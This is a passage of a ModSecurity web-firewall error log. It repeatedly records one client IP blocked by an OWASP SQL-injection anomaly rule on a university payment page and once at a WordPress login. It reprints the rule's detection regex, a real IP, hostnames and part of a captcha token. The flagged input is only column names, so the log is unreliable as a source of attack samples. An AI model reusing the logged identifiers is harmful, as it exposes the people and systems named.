[\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ToMCo-f0AAPXlye4AAAAA"]
[Tue Aug 29 09:10:41.623462 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1TocCo-f0AAPXlye8AAAAA"]
[Tue Aug 29 09:10:44.252908 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1TpMCo-f0AAPXlyfAAAAAA"]
[Tue Aug 29 09:12:30.355553 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UDsCo-f0AAPXlyfMAAAAA"]
[Tue Aug 29 09:12:31.416293 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UD8Co-f0AAPXlyfQAAAAA"]
[Tue Aug 29 09:12:31.847747 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UD8Co-f0AAPXlyfUAAAAA"]
[Tue Aug 29 09:12:32.014760 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfYAAAAA"]
[Tue Aug 29 09:12:32.183782 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfcAAAAA"]
[Tue Aug 29 09:12:32.344725 2023] [:error] [pid 62949] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UEMCo-f0AAPXlyfgAAAAA"]
[Tue Aug 29 09:12:40.690196 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGMCo-f0AAPXsiRsAAAAN"]
[Tue Aug 29 09:12:40.853199 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGMCo-f0AAPXsiRwAAAAN"]
[Tue Aug 29 09:12:41.039535 2023] [:error] [pid 62956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1UGcCo-f0AAPXsiR0AAAAN"]
[Tue Aug 29 09:16:26.617002 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwD_zWSoW9xqu43YjB0DQ_XYtFQNVT7upkuyBgKsDRfFA48otggO_7Y1zrBKfqqsmDFiYR-EYzQcnqZF4gJg0ktFpi9LCK_SjmOGFZ3asU5jLhJOR8dyGfrwTtVFpnykg4LvxLQMhi6sI68KkBUfet99zZhcG6IqgEv6XsfV5Z-2Puxn-TWc7GB05UFL5khHc7sQGgyGGk1KS4fxHd8VV_i_8kpA2pqc_omzWNtwU7vYVwuQlfZXRm5pl0cdnrWoiSH4xiMB1SavzrPfNBKYZmqYRyw286v9DkJ_5MG59PgWJNxCuQ8sBKdP00IazXfgA4Gf0VvyNHlVtD8VFQLBV91MSIj_ZvmloKccLFkgXRdZQfy2tvSaGYmdlV71kf8zOVR-Gez2jaFsh_frnB9abvoRYzxzTgE5QfTiC3_4jPZ4T5FGNQXm6HhRhKoM7sv..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1U@sCo-f0AAPa6wdYAAAAM"]
[Tue Aug 29 09:17:14.324126 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VKsCo-f0AAPa6whQAAAAM"]
[Tue Aug 29 09:17:16.087432 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VLMCo-f0AAPa6whUAAAAM"]
[Tue Aug 29 09:17:19.463205 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VL8Co-f0AAPa6whcAAAAM"]
[Tue Aug 29 09:17:19.925883 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VL8Co-f0AAPa6whgAAAAM"]
[Tue Aug 29 09:17:20.093596 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VMMCo-f0AAPa6whkAAAAM"]
[Tue Aug 29 09:17:20.243815 2023] [:error] [pid 63162] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VMMCo-f0AAPa6whoAAAAM"]
[Tue Aug 29 09:19:25.823173 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id 